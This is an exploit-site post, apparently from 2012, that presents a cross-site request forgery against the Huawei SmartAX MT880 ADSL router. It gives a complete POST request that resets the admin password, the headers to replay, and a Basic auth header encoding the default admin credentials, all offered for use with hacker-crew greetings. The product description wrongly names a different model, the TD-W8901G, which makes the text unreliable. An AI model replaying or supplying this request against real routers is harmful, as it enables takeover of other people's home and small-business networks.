HUAWEI SmartAX MT880 CSRF Vulnerability (ADSL Router)



EKU-ID: 2133 CVE: OSVDB-ID:
Author: KinG Of PiraTeS Published: 2012-05-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \
                                                    
================================================================================
####
# Exploit Title: HUAWEI SmartAX MT880 CSRF Vulnerability (ADSL Router)
# Author: KinG Of PiraTeS
# Facebook Profile: www.fb.me/cr4ck3d
# Facebeook Page : www.fb.me/serial.crack
# E-mail: t5r@hotmail.com
# Category:: Hardware
# Google Dork: NA
# Vendor: http://www.huawei.com/en/
# Version: MT880
# Security Risk : High
# Tested on: [Windows 7 Edition Intégrale 64bit ]
####


##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | * ------>  KinG Of PiraTeS * The g0bl!n <-------- * |
# | ------------------------------------------------- < |
###


#
1)Introduction
2)Vulnerability Description
3)Exploit
>> ----------------------------------------------------------------
1)Introduction
==============

54Mbps Wireless ADSL2+ Modem Router SmartAX MT880 is a high performance modem router that provides a full rate of ADSL2+ standard with the superb reliability and a cost-effective solution for home and small business. It is a 3-in-1 device that combines the function of a high-speed DSL modem, a 4-Port 10/100Mbps NAT router and a wireless G access point. Using the TD-W8901G, you can easily create a secure and high-speed wired/wireless network to share files, music, video, and printers with multiple computers.

2)Vulnerability Description
===========================

From SmartAX MT880 U can change the default "Admin" password Or Any User Password which is listening on tcp/ip port 80


3)Exploit : Using Live HTTP Headers ( Firefox AddOn )
=========
                   >>>>>>>>> Target IP is (192.168.1.1)            <<<<<<<<<<
                   >>>>>>>>> New Password (123123)                 <<<<<<<<<<
                   >>>>>>>>> (admin) Is the default Login FireWall <<<<<<<<<<
----------------------------------------------------------------------------------------------
##############################################################################################
Post : http://192.168.1.1/Action?user_id=admin&priv=1&pass1=123456&pass2=123456&id=3&cmdSubmit=Submit
----

HTTP Headers
------------
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.1.1/MainPage?id=3&ex_param1=admin
Cookie: sessionId=2
Authorization: Basic YWRtaW46YWRtaW4=




                             {Replay}

##############################################################################################
----------------------------------------------------------------------------------------------
If doesn't work try to change this (User-Agent) to ur Browser System (User-Agent)

####

Peace From Algeria

####
=================================**Algerians Hackers**===============================================
# Greets To :
   KedAns-Dz & Caddy-Dz & kalashinkov3 **All Algerians Hackers** , Kondamne ,  errajol ettayeb
   (exploit-id.com) , (1337day.com) , (Sec4ever.com) , (h4ckforu.com) , (alboraaq.com)
   All My Friendz: Hanixpo , Caddy-Dz , Indoushka , Jago-dz ,saoucha , BriscO-Dz
   Over-X , Kha&miX ,Ev!LsCr!pT_Dz , T0xic , Tn_Scorpion , ..others ♥___♥
=====================================================================================================